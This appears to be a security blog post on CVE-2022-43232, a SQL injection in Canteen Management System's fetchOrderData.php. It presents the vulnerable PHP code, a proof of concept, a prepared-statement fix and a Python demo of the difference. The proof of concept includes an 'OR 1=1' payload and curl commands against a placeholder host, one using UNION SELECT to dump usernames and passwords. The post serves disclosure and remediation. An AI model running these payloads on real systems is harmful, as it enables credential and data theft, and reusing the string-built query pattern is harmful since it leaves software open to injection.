Canteen Management System v1. helps organizations manage food orders and transactions in cafeterias and canteens. In late 2022 a serious bug, CVE-2022-43232, was found in this system, affecting how it handles user input. An attacker could use this bug to read, change, or destroy data stored in the database. In this post, I'll break down exactly what went wrong, how it works under the hood, and how you can test for and fix it. If you're running this software, this is a must-read.
🔎 What is CVE-2022-43232?
This vulnerability is a classic SQL injection. The flaw lives in the script /php_action/fetchOrderData.php. There, the input parameter userid is taken straight from the web request and spliced into a SQL query string, with no validation, escaping, or parameter binding.
Where Is the Problem?
When you request order data from the application, it expects a parameter called userid. It uses this value directly in its SQL query, like so:
```php
<?php
// fetchOrderData.php (vulnerable version): the raw POST value is
// interpolated directly into the SQL string
$userid = $_POST['userid'];
$result = $conn->query("SELECT * FROM orders WHERE userid = '$userid'");
```
🕵️ Proof of Concept (PoC): Exploiting the Bug
Because the code does not escape or bind the value, an attacker can include SQL syntax of their own in the userid field. For example, they might send:

```
userid=' OR 1=1 --
```

The database then sees the query as:

```sql
SELECT * FROM orders WHERE userid = '' OR 1=1 --'
```

Here, `OR 1=1` is always true, and `--` starts a comment, so the rest of the original query (including the closing quote) is ignored. Instead of returning the orders of a single user, the database hands every order to the attacker.
You can trigger the flaw with curl or Burp Suite. Here is a direct sample using curl:

```shell
curl -X POST -d "userid=' OR 1=1 -- " http://victim.com/php_action/fetchOrderData.php
```

If the site is vulnerable, this returns all order records.
Extracting User Data
If you want to go further and pull names and passwords from the users table, you can extend the query with a UNION:

```shell
curl -X POST -d "userid=' UNION SELECT 1, username, password, 4 FROM users -- " http://victim.com/php_action/fetchOrderData.php
```

> Note: This assumes the original query returns the same number of columns as the UNION SELECT (four here). A UNION only works when both halves return the same column count, so adjust the number of columns to match.
🔗 References & Resources
- Official CVE Record
- Exploit Database Entry
- OWASP SQL Injection
- Canteen Management System v1. on SourceForge
Here is how to fix the code using prepared statements in PHP (mysqli):

```php
<?php
// Secure version with prepared statements: the value is bound as a
// parameter and never becomes part of the SQL text
$userid = $_POST['userid'];
$stmt = $conn->prepare("SELECT * FROM orders WHERE userid = ?");
$stmt->bind_param("s", $userid); // "s" binds a string; use "i" if userid is an integer column
$stmt->execute();
$result = $stmt->get_result();
```

Note that `get_result()` requires the mysqlnd driver; on builds without it, use `bind_result()` and `fetch()` instead.
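To see why the prepared statement closes the hole, here is an added example (not code from Canteen Management System) that reproduces both the string-built query and the bound-parameter query against an in-memory SQLite table with constructed sample rows; the table layout and the data are assumptions, and the payload is the one shown above.

```python
import sqlite3

# Constructed sample rows standing in for the app's orders table (assumption).
SAMPLE_ORDERS = [
    (1, "alice", "coffee", 3),
    (2, "alice", "sandwich", 5),
    (3, "bob", "tea", 2),
]


def make_db():
    """Build an in-memory SQLite database with a four-column orders table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER, userid TEXT, item TEXT, price INTEGER)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?, ?)", SAMPLE_ORDERS)
    return conn


def fetch_orders_vulnerable(conn, userid):
    """Mirror fetchOrderData.php: the value is spliced into the SQL text."""
    sql = f"SELECT * FROM orders WHERE userid = '{userid}'"
    return conn.execute(sql).fetchall()


def fetch_orders_safe(conn, userid):
    """Mirror the prepared-statement fix: the value travels as a bound parameter."""
    return conn.execute("SELECT * FROM orders WHERE userid = ?", (userid,)).fetchall()


def compare():
    """Run a legitimate lookup and the injection payload through both versions.

    Returns row counts so the difference is visible: the vulnerable query turns
    the payload into a tautology and dumps every order, while the bound query
    treats the same bytes as a literal username that matches nothing.
    """
    conn = make_db()
    payload = "' OR 1=1 -- "
    return {
        "legit_vulnerable": len(fetch_orders_vulnerable(conn, "bob")),
        "legit_safe": len(fetch_orders_safe(conn, "bob")),
        "payload_vulnerable": len(fetch_orders_vulnerable(conn, payload)),
        "payload_safe": len(fetch_orders_safe(conn, payload)),
    }


if __name__ == "__main__":
    print(compare())
```

Both versions behave identically for a normal userid; only the bound version stays correct once the input carries SQL syntax.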
📝 Conclusion
CVE-2022-43232 is a serious vulnerability that is easy to exploit, even for inexperienced attackers. It exposes every user's orders and, with a crafted UNION query, potentially more sensitive data. If you are running Canteen Management System v1., patch it right away, and never build queries from raw user input.
Stay safe, patch early, and always sanitize your inputs!
*This post was written exclusively for tech readers who want actionable information. If you use or manage Canteen Management System, share this post to help keep others safe.*
Disclaimer:
These details are for educational and defensive purposes only. Do not attack systems you do not own or have permission to test.
Timeline
Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:48:00 UTC